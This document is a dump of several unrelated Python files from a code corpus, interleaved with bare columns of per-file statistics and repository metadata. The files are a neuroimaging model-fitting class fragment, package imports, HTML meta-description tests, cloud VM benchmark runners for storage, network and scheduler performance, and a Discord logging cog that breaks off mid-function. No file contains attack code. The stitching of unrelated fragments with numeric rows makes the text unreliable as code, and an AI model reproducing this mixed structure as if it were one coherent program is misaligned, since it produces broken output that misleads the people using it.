        self._fit_names(['value_gl_exp_invert_1', 'value_gl_exp_invert_0'])

    def model_1903(self):
        """ Value - derived from gains and losses diminished by (gaussian)
        similarity. Reward coding inverted. """
        self._fit_names(['value_gl_gauss_invert_1', 'value_gl_gauss_invert_0'])

    # POSITIVE CODING
    # --
    # Gains and losses, positive only
    def model_2001(self):
        """ Gains and losses. Reward coding was positive only. """
        self._fit_names(['gl_pos'])

    def model_2002(self):
        """ Gains and losses, diminished by (exponential) similarity.
        Reward coding was positive only. """
        self._fit_names(['gl_exp_pos'])

    def model_2003(self):
        """ Gains and losses, diminished by (gaussian) similarity.
        Reward coding was positive only. """
        self._fit_names(['gl_gauss_pos'])

    # --
    # g/l into 2 regressors pos only
    def model_2101(self):
        """ Gains and losses, in 2 regressors.
        Reward coding was positive only. """
        self._fit_names(['gl_pos_1', 'gl_pos_0'])

    def model_2102(self):
        """ Gains and losses, diminished by (exponential) similarity,
        in 2 regressors. Reward coding was positive only. """
        self._fit_names(['gl_exp_pos_1', 'gl_exp_pos_0'])

    def model_2103(self):
        """ Gains and losses, diminished by (gaussian) similarity,
        in 2 regressors. Reward coding was positive only. """
        self._fit_names(['gl_gauss_pos_1', 'gl_gauss_pos_0'])

    # --
    # g/l coding
    ## RPE
    def model_2501(self):
        """ RPE - derived from gains and losses.
        Reward coding was positive only. """
        self._fit_names(['rpe_gl_pos'])

    def model_2502(self):
        """ RPE - derived from gains and losses diminished by (exponential)
        similarity. Reward coding was positive only. """
        self._fit_names(['rpe_gl_exp_pos'])

    def model_2503(self):
        """ RPE - derived from gains and losses diminished by (gaussian)
        similarity. Reward coding was positive only. """
        self._fit_names(['rpe_gl_gauss_pos'])

    # --
    # g/l coding
    ## VALUE
    def model_2601(self):
        """ Value - derived from gains and losses.
        Reward coding was positive only. """
        self._fit_names(['value_gl_pos'])

    def model_2602(self):
        """ Value - derived from gains and losses diminished by (exponential)
        similarity. Reward coding was positive only. """
        self._fit_names(['value_gl_exp_pos'])

    def model_2603(self):
        """ Value - derived from gains and losses diminished by (gaussian)
        similarity. Reward coding was positive only. """
        self._fit_names(['value_gl_gauss_pos'])

    # --
    # g/l coding, into 2 regressors
    ## RPE
    def model_2701(self):
        """ RPE - derived from gains and losses.
        Reward coding was positive only. """
        self._fit_names(['rpe_gl_pos_1', 'rpe_gl_pos_0'])

    def model_2702(self):
        """ RPE - derived from gains and losses diminished by (exponential)
        similarity. Reward coding was positive only. """
        self._fit_names(['rpe_gl_exp_pos_1', 'rpe_gl_exp_pos_0'])

    def model_2703(self):
        """ RPE - derived from gains and losses diminished by (gaussian)
        similarity. Reward coding was positive only. """
        self._fit_names(['rpe_gl_gauss_pos_1', 'rpe_gl_gauss_pos_0'])

    # --
    # g/l coding, into 2 regressors
    ## VALUE
    def model_2801(self):
        """ Value - derived from gains and losses.
        Reward coding was positive only. """
        self._fit_names(['value_gl_pos_1', 'value_gl_pos_0'])

    def model_2802(self):
        """ Value - derived from gains and losses diminished by (exponential)
        similarity. Reward coding was positive only. """
        self._fit_names(['value_gl_exp_pos_1', 'value_gl_exp_pos_0'])

    def model_2803(self):
        """ Value - derived from gains and losses diminished by (gaussian)
        similarity. Reward coding was positive only. """
        self._fit_names(['value_gl_gauss_pos_1', 'value_gl_gauss_pos_0'])

    # --
    # CONTROL MODELS
    def model_29(self):
        """ Outcome similarity (exponential). """
        self._fit_names(['exp'])

    def model_30(self):
        """ Outcome similarity (gaussian). """
        self._fit_names(['gauss'])

    def model_31(self):
        """ Behavioral/category responses as separate regressors. """
        self._fit_names(['resp1', 'resp6'])

    def model_32(self):
        """ Outcome and contra-outcome similarities (exponential),
        as separate regressors. """
        self._fit_names(['exp', 'exp_opp'])

    def model_33(self):
        """ Outcome and contra-outcome similarities (gaussian),
        as separate regressors. """
        self._fit_names(['gauss', 'gauss_opp'])

    def model_34(self):
        """ Gabor angle parameter. """
        self._fit_names(['angle'])

    def model_35(self):
        """ Gabor width parameter. """
        self._fit_names(['width'])
| 29.95
| 78
| 0.609235
| 3,590
| 26,356
| 4.209471
| 0.056825
| 0.090524
| 0.135786
| 0.070408
| 0.915365
| 0.910336
| 0.88969
| 0.886911
| 0.871758
| 0.854619
| 0
| 0.01862
| 0.258271
| 26,356
| 879
| 79
| 29.984073
| 0.754412
| 0.253946
| 0
| 0.589147
| 0
| 0
| 0.122346
| 0.009251
| 0
| 0
| 0
| 0
| 0
| 1
| 0.198966
| false
| 0
| 0.002584
| 0
| 0.204134
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
871f6fd87213e1b2222869a5f9bf20984fdc7af2
| 35
|
py
|
Python
|
app/calculator/__init__.py
|
thasmarinho/setic-test-workshop
|
f12c62f55a17f9e6eddb979379e23f3c57953239
|
[
"MIT"
] | 1
|
2020-12-12T17:14:59.000Z
|
2020-12-12T17:14:59.000Z
|
calculator/__init__.py
|
immmdreza/Calculator
|
412484caeb563dd12f4473d0d53a8689ae5ec9c0
|
[
"Apache-2.0"
] | null | null | null |
calculator/__init__.py
|
immmdreza/Calculator
|
412484caeb563dd12f4473d0d53a8689ae5ec9c0
|
[
"Apache-2.0"
] | 1
|
2021-07-11T12:19:09.000Z
|
2021-07-11T12:19:09.000Z
|
from .calculator import Calculator
| 17.5
| 34
| 0.857143
| 4
| 35
| 7.5
| 0.75
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.114286
| 35
| 1
| 35
| 35
| 0.967742
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
873d1f564b8fa7a7506c8db6aa647ab85d1328f2
| 225
|
py
|
Python
|
floss/__init__.py
|
dshunfen/flare-floss
|
4bb366f9895bd191192cb15fd2bfcfbda2755730
|
[
"Apache-2.0"
] | null | null | null |
floss/__init__.py
|
dshunfen/flare-floss
|
4bb366f9895bd191192cb15fd2bfcfbda2755730
|
[
"Apache-2.0"
] | null | null | null |
floss/__init__.py
|
dshunfen/flare-floss
|
4bb366f9895bd191192cb15fd2bfcfbda2755730
|
[
"Apache-2.0"
] | null | null | null |
# Copyright (C) 2017 FireEye, Inc. All Rights Reserved.
from __future__ import absolute_import
from .utils import ONE_MB
from .utils import STACK_MEM_NAME
from .utils import makeEmulator
from .utils import removeStackMemory
| 28.125
| 55
| 0.822222
| 32
| 225
| 5.53125
| 0.625
| 0.20339
| 0.338983
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.020513
| 0.133333
| 225
| 7
| 56
| 32.142857
| 0.887179
| 0.235556
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
875e6f91840435fa62d116a12b468c01cfc67dd8
| 752
|
py
|
Python
|
tests/checks/test_meta.py
|
rohan-pednekar/combine
|
23206e1a7a34800acd34beedeea018fb48591633
|
[
"MIT"
] | 5
|
2021-01-25T19:40:04.000Z
|
2022-01-02T13:45:45.000Z
|
tests/checks/test_meta.py
|
rohan-pednekar/combine
|
23206e1a7a34800acd34beedeea018fb48591633
|
[
"MIT"
] | 14
|
2018-07-06T17:19:33.000Z
|
2021-12-22T18:05:57.000Z
|
tests/checks/test_meta.py
|
rohan-pednekar/combine
|
23206e1a7a34800acd34beedeea018fb48591633
|
[
"MIT"
] | 3
|
2019-02-12T10:05:45.000Z
|
2021-11-16T04:32:43.000Z
|
from bs4 import BeautifulSoup
from combine.checks.meta import MetaDescriptionCheck
def test_meta_description_empty_check(snapshot):
    """Snapshot the issues reported for a description <meta> tag that has
    no content attribute at all."""
    content = """<!doctype html>
    <html>
    <head>
    <meta name="description" />
    </head>
    <body>
    </body>
    </html>"""
    check = MetaDescriptionCheck(BeautifulSoup(content, "html.parser"))
    issues = check.run()
    # Serialized issue list is compared against the stored snapshot fixture.
    snapshot.assert_match(issues.as_data())
def test_meta_description_length_check(snapshot):
    """Snapshot the issues reported for a description <meta> tag whose
    content ("Whoops") is present but too short."""
    content = """<!doctype html>
    <html>
    <head>
    <meta name="description" content="Whoops" />
    </head>
    <body>
    </body>
    </html>"""
    check = MetaDescriptionCheck(BeautifulSoup(content, "html.parser"))
    issues = check.run()
    # Serialized issue list is compared against the stored snapshot fixture.
    snapshot.assert_match(issues.as_data())
| 23.5
| 71
| 0.666223
| 80
| 752
| 6.1125
| 0.3625
| 0.02863
| 0.04499
| 0.08998
| 0.711656
| 0.711656
| 0.711656
| 0.711656
| 0.711656
| 0.711656
| 0
| 0.001634
| 0.18617
| 752
| 31
| 72
| 24.258065
| 0.797386
| 0
| 0
| 0.769231
| 0
| 0
| 0.349734
| 0
| 0
| 0
| 0
| 0
| 0.076923
| 1
| 0.076923
| false
| 0
| 0.076923
| 0
| 0.153846
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
5e77093914b6e7dc6e493fc31e4737ef2d758102
| 20,000
|
py
|
Python
|
WS2012R2/lisa/tools/middleware_bench/suites/micro.py
|
LiliDeng/lis-test
|
a551326349e1aea86f51678098c747f6a092b4f6
|
[
"Apache-2.0"
] | null | null | null |
WS2012R2/lisa/tools/middleware_bench/suites/micro.py
|
LiliDeng/lis-test
|
a551326349e1aea86f51678098c747f6a092b4f6
|
[
"Apache-2.0"
] | null | null | null |
WS2012R2/lisa/tools/middleware_bench/suites/micro.py
|
LiliDeng/lis-test
|
a551326349e1aea86f51678098c747f6a092b4f6
|
[
"Apache-2.0"
] | null | null | null |
"""
Linux on Hyper-V and Azure Test Code, ver. 1.0.0
Copyright (c) Microsoft Corporation
All rights reserved
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
See the Apache Version 2.0 License for specific language governing
permissions and limitations under the License.
"""
import os
import time
import logging
from utils import constants
from utils import shortcut
from utils.setup import SetupTestEnv
from report.db_utils import upload_results
from report.results_parser import TCPLogsReader, LatencyLogsReader, StorageLogsReader,\
SingleTCPLogsReader, UDPLogsReader, SchedulerLogsReader
# Timestamped console logging shared by every benchmark entry point below.
logging.basicConfig(format='%(asctime)s %(levelname)s: %(message)s',
                    datefmt='%y/%m/%d %H:%M:%S', level=logging.INFO)
log = logging.getLogger(__name__)
def test_storage(provider, keyid, secret, token, imageid, subscription, tenant, projectid,
                 instancetype, user, localpath, region, zone, sriov, kernel):
    """
    Run FIO storage profile.
    :param provider: Service provider to be used e.g. azure, aws, gce.
    :param keyid: user key for executing remote connection
    :param secret: user secret for executing remote connection
    :param token: GCE refresh token obtained with gcloud sdk
    :param subscription: Azure specific subscription id
    :param tenant: Azure specific tenant id
    :param projectid: GCE specific project id
    :param imageid: AWS OS AMI image id or
                    Azure image references offer and sku: e.g. 'UbuntuServer#16.04.0-LTS'.
    :param instancetype: AWS instance resource type e.g 'd2.4xlarge' or
                    Azure hardware profile vm size e.g. 'Standard_DS14_v2'.
    :param user: remote ssh user for the instance
    :param localpath: localpath where the logs should be downloaded, and the
                    default path for other necessary tools
    :param region: EC2 region to connect to
    :param zone: EC2 zone where other resources should be available
    :param sriov: Enable or disable SR-IOV
    :param kernel: custom kernel name provided in localpath
    :raises ValueError: if *provider* is not one of the known constants.
    """
    # RAID is currently disabled for this profile; kept as a knob because
    # SetupTestEnv and the result labels below take it as a parameter.
    raid = 0
    if provider == constants.AWS:
        disk_size = 2048
        device = "aws_device"
    elif provider == constants.AZURE:
        disk_size = 2048
        device = "azure_device"
    elif provider == constants.GCE:
        disk_size = 167
        # Fix: the original set constants.RAID_DEV under `if raid:` and then
        # unconditionally overwrote it with "nvme", making the RAID branch
        # dead code. Honor the raid flag instead (identical behavior while
        # raid == 0).
        device = constants.RAID_DEV if raid else "nvme"
    else:
        # Fix: previously an unknown provider left `device` unbound and
        # crashed later with a NameError at test_cmd.format(device).
        raise ValueError('Unsupported provider: {}'.format(provider))

    test_env = SetupTestEnv(provider=provider, vm_count=1, test_type=constants.VM_DISK,
                            disk_size=disk_size, raid=raid, keyid=keyid, secret=secret,
                            token=token, subscriptionid=subscription, tenantid=tenant,
                            projectid=projectid, imageid=imageid, instancetype=instancetype,
                            user=user, localpath=localpath, region=region, zone=zone, sriov=sriov,
                            kernel=kernel)
    test_cmd = '/tmp/run_storage.sh {}'.format(device)
    # Timestamped zip name keeps repeated runs from clobbering each other.
    results_path = os.path.join(localpath, 'storage{}_{}.zip'.format(str(time.time()),
                                                                     instancetype))
    test_env.run_test(testname='storage', test_cmd=test_cmd, raid=raid, results_path=results_path,
                      timeout=constants.TIMEOUT * 2)
    upload_results(localpath=localpath, table_name='Perf_{}_Storage'.format(provider),
                   results_path=results_path, parser=StorageLogsReader,
                   other_table=('.deb' in kernel),
                   test_case_name='{}_Storage_perf_tuned_NVME'.format(provider),
                   provider=provider, region=region, data_path=shortcut.data_path(sriov),
                   host_type=shortcut.host_type(provider), instance_size=instancetype,
                   disk_setup='RAID0:{}x{}G'.format(raid, disk_size))
def test_storage_nvme(provider, keyid, secret, token, imageid, subscription, tenant, projectid,
                      instancetype, user, localpath, region, zone, sriov, kernel):
    """
    Run the FIO storage profile directly against the instance's NVMe device
    (single VM, no extra data disk, no RAID).
    :param provider: Service provider to be used e.g. azure, aws, gce.
    :param keyid: user key for executing remote connection
    :param secret: user secret for executing remote connection
    :param token: GCE refresh token obtained with gcloud sdk
    :param subscription: Azure specific subscription id
    :param tenant: Azure specific tenant id
    :param projectid: GCE specific project id
    :param imageid: AWS OS AMI image id or
                    Azure image references offer and sku: e.g. 'UbuntuServer#16.04.0-LTS'.
    :param instancetype: AWS instance resource type e.g 'd2.4xlarge' or
                    Azure hardware profile vm size e.g. 'Standard_DS14_v2'.
    :param user: remote ssh user for the instance
    :param localpath: localpath where the logs should be downloaded, and the
                    default path for other necessary tools
    :param region: EC2 region to connect to
    :param zone: EC2 zone where other resources should be available
    :param sriov: Enable or disable SR-IOV
    :param kernel: custom kernel name provided in localpath
    """
    # Single VM, no managed data disk: FIO targets the local NVMe drive.
    env = SetupTestEnv(provider=provider, vm_count=1, test_type=None,
                       disk_size=None, raid=False, keyid=keyid, secret=secret,
                       token=token, subscriptionid=subscription, tenantid=tenant,
                       projectid=projectid, imageid=imageid, instancetype=instancetype,
                       user=user, localpath=localpath, region=region, zone=zone, sriov=sriov,
                       kernel=kernel)
    cmd = '/tmp/run_storage.sh nvme'
    # Timestamped archive name avoids collisions between repeated runs.
    log_archive = os.path.join(localpath, 'storage{}_{}.zip'.format(str(time.time()),
                                                                    instancetype))
    env.run_test(testname='storage', test_cmd=cmd, raid=False, results_path=log_archive,
                 timeout=constants.TIMEOUT * 2)
    upload_results(localpath=localpath, table_name='Perf_{}_Storage'.format(provider),
                   results_path=log_archive, parser=StorageLogsReader,
                   other_table=('.deb' in kernel),
                   test_case_name='{}_Storage_perf_tuned_NVME'.format(provider),
                   provider=provider, region=region, data_path=shortcut.data_path(sriov),
                   host_type=shortcut.host_type(provider), instance_size=instancetype,
                   disk_setup='NVMe')
def test_network_tcp(provider, keyid, secret, token, imageid, subscription, tenant, projectid,
                     instancetype, user, localpath, region, zone, sriov, kernel):
    """Deploy two VMs and run the NTTTCP TCP throughput profile between them.

    :param provider: service provider to be used e.g. azure, aws, gce
    :param keyid: user key for executing remote connection
    :param secret: user secret for executing remote connection
    :param token: GCE refresh token obtained with gcloud sdk
    :param imageid: AWS OS AMI image id or Azure image reference offer and sku,
        e.g. 'UbuntuServer#16.04.0-LTS'
    :param subscription: Azure specific subscription id
    :param tenant: Azure specific tenant id
    :param projectid: GCE specific project id
    :param instancetype: AWS instance resource type e.g. 'd2.4xlarge' or Azure
        hardware profile vm size e.g. 'Standard_DS14_v2'
    :param user: remote ssh user for the instance
    :param localpath: local path where the logs should be downloaded, and the
        default path for other necessary tools
    :param region: EC2 region to connect to
    :param zone: EC2 zone where other resources should be available
    :param sriov: enable or disable SR-IOV
    :param kernel: custom kernel name provided in localpath
    """
    env_args = dict(provider=provider, vm_count=2, test_type=None, disk_size=None,
                    raid=False, keyid=keyid, secret=secret, token=token,
                    subscriptionid=subscription, tenantid=tenant, projectid=projectid,
                    imageid=imageid, instancetype=instancetype, user=user,
                    localpath=localpath, region=region, zone=zone, sriov=sriov,
                    kernel=kernel)
    environment = SetupTestEnv(**env_args)
    # The second VM (index 2) acts as the remote endpoint of the TCP run.
    remote_cmd = '/tmp/run_network.sh {} {} {}'.format(environment.vm_ips[2], user, 'TCP')
    archive_name = 'network_tcp_{}_{}_{}.zip'.format(str(time.time()), instancetype, sriov)
    archive_path = os.path.join(localpath, archive_name)
    environment.run_test(ssh_vm_conf=1, testname='network', test_cmd=remote_cmd,
                         results_path=archive_path)
    upload_results(localpath=localpath, table_name='Perf_{}_Network_TCP'.format(provider),
                   results_path=archive_path, parser=TCPLogsReader,
                   other_table=('.deb' in kernel),
                   test_case_name='{}_Network_TCP_perf_delay_30'.format(provider),
                   provider=provider, region=region, data_path=shortcut.data_path(sriov),
                   host_type=shortcut.host_type(provider), instance_size=instancetype)
def test_network_udp(provider, keyid, secret, token, imageid, subscription, tenant, projectid,
                     instancetype, user, localpath, region, zone, sriov, kernel):
    """Deploy two VMs and run the iperf3 UDP throughput profile between them.

    :param provider: service provider to be used e.g. azure, aws, gce
    :param keyid: user key for executing remote connection
    :param secret: user secret for executing remote connection
    :param token: GCE refresh token obtained with gcloud sdk
    :param imageid: AWS OS AMI image id or Azure image reference offer and sku,
        e.g. 'UbuntuServer#16.04.0-LTS'
    :param subscription: Azure specific subscription id
    :param tenant: Azure specific tenant id
    :param projectid: GCE specific project id
    :param instancetype: AWS instance resource type e.g. 'd2.4xlarge' or Azure
        hardware profile vm size e.g. 'Standard_DS14_v2'
    :param user: remote ssh user for the instance
    :param localpath: local path where the logs should be downloaded, and the
        default path for other necessary tools
    :param region: EC2 region to connect to
    :param zone: EC2 zone where other resources should be available
    :param sriov: enable or disable SR-IOV
    :param kernel: custom kernel name provided in localpath
    """
    env_args = dict(provider=provider, vm_count=2, test_type=None, disk_size=None,
                    raid=False, keyid=keyid, secret=secret, token=token,
                    subscriptionid=subscription, tenantid=tenant, projectid=projectid,
                    imageid=imageid, instancetype=instancetype, user=user,
                    localpath=localpath, region=region, zone=zone, sriov=sriov,
                    kernel=kernel)
    environment = SetupTestEnv(**env_args)
    # The second VM (index 2) acts as the remote endpoint of the UDP run.
    remote_cmd = '/tmp/run_network.sh {} {} {}'.format(environment.vm_ips[2], user, 'UDP')
    archive_name = 'network_udp_{}_{}_{}.zip'.format(str(time.time()), instancetype, sriov)
    archive_path = os.path.join(localpath, archive_name)
    environment.run_test(ssh_vm_conf=1, testname='network', test_cmd=remote_cmd,
                         results_path=archive_path)
    upload_results(localpath=localpath, table_name='Perf_{}_Network_UDP'.format(provider),
                   results_path=archive_path, parser=UDPLogsReader,
                   other_table=('.deb' in kernel),
                   test_case_name='{}_Network_UDP_perf_tuned'.format(provider),
                   provider=provider, region=region, data_path=shortcut.data_path(sriov),
                   host_type=shortcut.host_type(provider), instance_size=instancetype)
def test_network_latency(provider, keyid, secret, token, imageid, subscription, tenant, projectid,
                         instancetype, user, localpath, region, zone, sriov, kernel):
    """Deploy two VMs and run the lagscope network latency profile between them.

    :param provider: service provider to be used e.g. azure, aws, gce
    :param keyid: user key for executing remote connection
    :param secret: user secret for executing remote connection
    :param token: GCE refresh token obtained with gcloud sdk
    :param imageid: AWS OS AMI image id or Azure image reference offer and sku,
        e.g. 'UbuntuServer#16.04.0-LTS'
    :param subscription: Azure specific subscription id
    :param tenant: Azure specific tenant id
    :param projectid: GCE specific project id
    :param instancetype: AWS instance resource type e.g. 'd2.4xlarge' or Azure
        hardware profile vm size e.g. 'Standard_DS14_v2'
    :param user: remote ssh user for the instance
    :param localpath: local path where the logs should be downloaded, and the
        default path for other necessary tools
    :param region: EC2 region to connect to
    :param zone: EC2 zone where other resources should be available
    :param sriov: enable or disable SR-IOV
    :param kernel: custom kernel name provided in localpath
    """
    env_args = dict(provider=provider, vm_count=2, test_type=None, disk_size=None,
                    raid=False, keyid=keyid, secret=secret, token=token,
                    subscriptionid=subscription, tenantid=tenant, projectid=projectid,
                    imageid=imageid, instancetype=instancetype, user=user,
                    localpath=localpath, region=region, zone=zone, sriov=sriov,
                    kernel=kernel)
    environment = SetupTestEnv(**env_args)
    # The second VM (index 2) acts as the remote endpoint of the latency run.
    remote_cmd = '/tmp/run_network.sh {} {} {}'.format(environment.vm_ips[2], user, 'latency')
    archive_name = 'network_latency_{}_{}_{}.zip'.format(str(time.time()), instancetype, sriov)
    archive_path = os.path.join(localpath, archive_name)
    environment.run_test(ssh_vm_conf=1, testname='network', test_cmd=remote_cmd,
                         results_path=archive_path)
    upload_results(localpath=localpath, table_name='Perf_{}_Network_Latency'.format(provider),
                   results_path=archive_path, parser=LatencyLogsReader,
                   other_table=('.deb' in kernel),
                   test_case_name='{}_Network_Latency_perf_tuned'.format(provider),
                   provider=provider, region=region, data_path=shortcut.data_path(sriov),
                   host_type=shortcut.host_type(provider), instance_size=instancetype)
def test_network_single_tcp(provider, keyid, secret, token, imageid, subscription, tenant,
                            projectid, instancetype, user, localpath, region, zone, sriov, kernel):
    """Run the variable TCP buffer network profile for a single connection.

    :param provider: service provider to be used e.g. azure, aws, gce
    :param keyid: user key for executing remote connection
    :param secret: user secret for executing remote connection
    :param token: GCE refresh token obtained with gcloud sdk
    :param imageid: AWS OS AMI image id or Azure image reference offer and sku,
        e.g. 'UbuntuServer#16.04.0-LTS'
    :param subscription: Azure specific subscription id
    :param tenant: Azure specific tenant id
    :param projectid: GCE specific project id
    :param instancetype: AWS instance resource type e.g. 'd2.4xlarge' or Azure
        hardware profile vm size e.g. 'Standard_DS14_v2'
    :param user: remote ssh user for the instance
    :param localpath: local path where the logs should be downloaded, and the
        default path for other necessary tools
    :param region: EC2 region to connect to
    :param zone: EC2 zone where other resources should be available
    :param sriov: enable or disable SR-IOV
    :param kernel: custom kernel name provided in localpath
    """
    test_env = SetupTestEnv(provider=provider, vm_count=2, test_type=None, disk_size=None,
                            raid=False, keyid=keyid, secret=secret, token=token,
                            subscriptionid=subscription, tenantid=tenant, projectid=projectid,
                            imageid=imageid, instancetype=instancetype, user=user,
                            localpath=localpath, region=region, zone=zone, sriov=sriov,
                            kernel=kernel)
    # The second VM (index 2) acts as the remote endpoint of the run.
    test_cmd = '/tmp/run_network.sh {} {} {}'.format(test_env.vm_ips[2], user, 'single_tcp')
    # Fix: add the missing '_' separator before the timestamp so the archive
    # name follows the same pattern as the sibling tests
    # (network_tcp_..., network_udp_..., network_latency_...).
    results_path = os.path.join(localpath, 'network_single_tcp_{}_{}_{}.zip'.format(
        str(time.time()), instancetype, sriov))
    test_env.run_test(ssh_vm_conf=1, testname='network', test_cmd=test_cmd,
                      results_path=results_path)
    upload_results(localpath=localpath, table_name='Perf_{}_Network_Single_TCP'.format(provider),
                   results_path=results_path, parser=SingleTCPLogsReader,
                   other_table=('.deb' in kernel),
                   test_case_name='{}_Network_Single_TCP_perf_tuned'.format(provider),
                   provider=provider, region=region, data_path=shortcut.data_path(sriov),
                   host_type=shortcut.host_type(provider), instance_size=instancetype)
def test_scheduler(provider, keyid, secret, token, imageid, subscription, tenant,
                   projectid, instancetype, user, localpath, region, zone, sriov, kernel):
    """Deploy a single VM and run the full kernel scheduler benchmark suite.

    :param provider: service provider to be used e.g. azure, aws, gce
    :param keyid: user key for executing remote connection
    :param secret: user secret for executing remote connection
    :param token: GCE refresh token obtained with gcloud sdk
    :param imageid: AWS OS AMI image id or Azure image reference offer and sku,
        e.g. 'UbuntuServer#16.04.0-LTS'
    :param subscription: Azure specific subscription id
    :param tenant: Azure specific tenant id
    :param projectid: GCE specific project id
    :param instancetype: AWS instance resource type e.g. 'd2.4xlarge' or Azure
        hardware profile vm size e.g. 'Standard_DS14_v2'
    :param user: remote ssh user for the instance
    :param localpath: local path where the logs should be downloaded, and the
        default path for other necessary tools
    :param region: EC2 region to connect to
    :param zone: EC2 zone where other resources should be available
    :param sriov: enable or disable SR-IOV
    :param kernel: custom kernel name provided in localpath
    """
    env_args = dict(provider=provider, vm_count=1, test_type=None, disk_size=None,
                    raid=False, keyid=keyid, secret=secret, token=token,
                    subscriptionid=subscription, tenantid=tenant, projectid=projectid,
                    imageid=imageid, instancetype=instancetype, user=user,
                    localpath=localpath, region=region, zone=zone, sriov=sriov,
                    kernel=kernel)
    environment = SetupTestEnv(**env_args)
    # 'all' runs every scheduler sub-benchmark of the remote script.
    remote_cmd = '/tmp/run_scheduler.sh {}'.format('all')
    archive_path = os.path.join(environment.localpath, '{}{}_{}.zip'.format(
        'scheduler', str(time.time()), environment.instancetype))
    environment.run_test(testname='scheduler', test_cmd=remote_cmd, results_path=archive_path)
    # NOTE(review): unlike the network/storage tests, no data_path argument is
    # passed to upload_results here — confirm whether that is intentional.
    upload_results(localpath=localpath, table_name='Perf_{}_Scheduler'.format(provider),
                   results_path=archive_path, parser=SchedulerLogsReader,
                   other_table=('.deb' in kernel),
                   test_case_name='{}_Scheduler_perf_tuned'.format(provider),
                   host_type=shortcut.host_type(provider), instance_size=instancetype)
| 57.636888
| 99
| 0.6608
| 2,440
| 20,000
| 5.291393
| 0.097131
| 0.02982
| 0.019518
| 0.030362
| 0.877469
| 0.875842
| 0.873209
| 0.857718
| 0.841995
| 0.815196
| 0
| 0.00853
| 0.25555
| 20,000
| 346
| 100
| 57.803468
| 0.85862
| 0.40535
| 0
| 0.56962
| 0
| 0
| 0.076712
| 0.03237
| 0
| 0
| 0
| 0
| 0
| 1
| 0.044304
| false
| 0
| 0.050633
| 0
| 0.094937
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
5e9362ef24ecd8560efc51014f0124ae7845b172
| 10,876
|
py
|
Python
|
cogs/logger.py
|
Shio7/NaOs
|
afffdb467e8a7878e2bcac2f961496cee1180d4c
|
[
"MIT"
] | 6
|
2020-09-01T08:20:49.000Z
|
2021-01-21T15:23:33.000Z
|
cogs/logger.py
|
Shio7/NaOs
|
afffdb467e8a7878e2bcac2f961496cee1180d4c
|
[
"MIT"
] | 3
|
2020-11-04T23:25:38.000Z
|
2021-01-21T17:01:20.000Z
|
cogs/logger.py
|
Shio7/NaOs
|
afffdb467e8a7878e2bcac2f961496cee1180d4c
|
[
"MIT"
] | 11
|
2020-09-01T08:04:17.000Z
|
2021-02-07T13:12:16.000Z
|
# Last Edited: 2020-12-29
# Contributor: Shio
# Code Description: logger cog (original note "로거" = "logger")
import discord
from discord.ext import commands
from evs import default
from evs import permissions, default, http, dataIO
import requests
import os
from datetime import datetime
logfolder = "./lib/logs/"
loadingurl = "https://cdn.discordapp.com/attachments/751791353779716099/793328911568076800/keterloading.gif"
class Logger(commands.Cog):
    """Cog that mirrors message delete/edit events into a per-guild log channel.

    The log channel id of each guild is persisted as plain text in a file
    named ``<guild id>.ktx`` under ``./lib/logs/``.
    """

    def __init__(self, bot):
        # bot: the running discord.py bot instance.
        self.bot = bot
        # Create the log folder on first start-up (original comment: "create folder").
        if os.path.isdir("./lib/logs"):
            print("Logs exist")
        else:
            os.makedirs("./lib/logs")

    @commands.command()
    @commands.check(permissions.is_owner)
    async def 로그(self, ctx):
        # Owner-only interactive command ("로그" = "log"): asks for confirmation
        # via a check-mark reaction, then stores (or replaces) this guild's log
        # channel id in ./lib/logs/<guild id>.ktx.
        embed = discord.Embed(title="관리", description= "로그 기능을 활성화 하시겠습니까?", color=0xeff0f1)
        embed.set_footer(icon_url=ctx.author.avatar_url,
                         text=ctx.author.name + "#" + ctx.author.discriminator + " " + str(
                             datetime.today().strftime('%Y-%m-%d %H:%M:%S')))
        embed.set_thumbnail(url= ctx.guild.icon_url)
        msg = await ctx.send(embed=embed)

        def reaction_check_(m):
            # Accept only the ✅ reaction added by the invoker on the current
            # prompt message (msg is rebound as the dialog advances).
            if m.message_id == msg.id and m.user_id == ctx.author.id and str(m.emoji) == "✅":
                return True
            return False

